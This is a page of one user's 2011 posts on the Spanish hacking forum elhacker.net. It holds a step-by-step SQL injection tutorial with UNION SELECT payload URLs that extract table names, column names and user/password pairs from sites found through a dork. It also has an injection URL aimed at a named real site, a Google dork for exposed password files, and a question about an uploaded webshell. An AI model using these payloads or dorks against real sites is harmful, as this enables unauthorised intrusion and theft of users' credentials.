elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Top 20 herramientas Hacking más populares de 2020


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15
41  Seguridad Informática / Nivel Web / webshell inyectada, pero no la encuentro en: 19 Noviembre 2011, 13:53 pm
Tengo acceso a un servidor en el que puedo subir una webshell, pero una vez subida no la encuentro, he probado nikto y dirbuster.

Alguien puede ayudarme? la idea es crear un videotuto
42  Foros Generales / Dudas Generales / posible falla???? en: 31 Octubre 2011, 19:34 pm
Tengo una duda sobre un posible fallo en una web.
El caso es que trasteando, cuando modificas la url, de esta manera

www.XXXXXXXX.com/asdf

me devuelve la pagina mal cargada, con este error:

Citar
An error occurred
Page not found
Exception information:

Message: Invalid controller specified (asdf)
Stack trace:

#0 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))
#1 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Application/Bootstrap/Bootstrap.php(97): Zend_Controller_Front->dispatch()
#2 /var/www/vhosts/XXXXXXXXX.com/httpdocs/library/Zend/Application.php(366): Zend_Application_Bootstrap_Bootstrap->run()
#3 /var/www/vhosts/XXXXXXXX.com/httpdocs/index.php(71): Zend_Application->run()
#4 {main} 

Request Parameters:

array (
  'controller' => 'asdf',
  'action' => 'index',
  'module' => 'default',


La pregunta es si alguien sabe, si esto es una falla explotable?
43  Foros Generales / Foro Libre / herramientas muy utiles en: 8 Octubre 2011, 21:57 pm
no siempre se pide, tambien se da, asi que un regalo para todos.
lo encontre en "pastebin"

Citar
44  Foros Generales / Foro Libre / tipos de hash en: 18 Septiembre 2011, 22:53 pm
DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"), then there follows the actual hash.

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.

..... y muchos mas....

fuente:http://forum.insidepro.com/viewtopic.php?t=8225
45  Seguridad Informática / Nivel Web / dork zend de exploit-db en: 11 Septiembre 2011, 22:39 pm
Los Dork's son peligrosos, eso todos lo sabemos, bueno, pues aqui les dejo un ejemplo de como se pueden usar. La verdad no tinen ninguna ciencia.

En concreto este:

Google search: filetype:ini "Bootstrap.php" (pass|passwd|password|pwd)
Submited: 2011-08-25

http://www.youtube.com/watch?v=KJCnUlv-Xj4
46  Seguridad Informática / Nivel Web / vulnerable a injeccion remota SQL en: 31 Agosto 2011, 23:33 pm
Citar
**********************************************
********************ruben_linux***************
**********************************************
******vulnerable a injeccion remota SQL*******

autor==>ruben_linux
equipo=>ruben_linux

http://bestfan.com/viewnews.php?id=253+and+1=0+1,2,3,4,5,6,7,8,9,10,11,12--

***********************************************
******************ruben_linux******************
***********************************************

fuente: http://packetstormsecurity.org/files/view/104643/arsolutions-sql.txt

 ;-) ;-)
47  Seguridad Informática / Desafíos - Wargames / Re: Duda con el Spoof en: 29 Agosto 2011, 15:51 pm
puedes mostrar toda la cabecera??
48  Seguridad Informática / WarZone / Re: Zona 0 en: 27 Agosto 2011, 19:33 pm
Citar
method="GET"

Sabes como se comunica un cliente con un servidor,... los metodos "post" y "get"

Citar
if (cod.length != 16){

si la longitud es distinta (!=) de 16....

Citar
Qué es "var"?

Necesitas algun tuto de programacion... var...iables...?

Citar
prueba (Zona 0)

Cual es esa??? :huh:
49  Seguridad Informática / Nivel Web / Re: sqli+bug+exploit=videotuto en: 26 Agosto 2011, 13:05 pm
A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió.  ;-)

Gracias WarGhost. Ya lo cambie.
50  Seguridad Informática / Nivel Web / sqli+bug+exploit=videotuto en: 25 Agosto 2011, 23:47 pm
Saludos a todos. Soy ruben_linux, voy enseñar como hago SQLi

1.- buscamos victima.

inurl:software/categoria.php?

2.- exploit

 +and+1=0

3.- buscamos union select

Citar

4.- buscamos las tablas

Citar
http://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--

5.- buscamos las columnas

Citar
http://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--

6.- le pedimos que nos muestre el nick y la pass de la tabla usuarios.

Citar
   vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:pass

podemos buscar más tablas, y más columnas, aquí solo muestro una pantalla pero se pueden sacar más.

Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines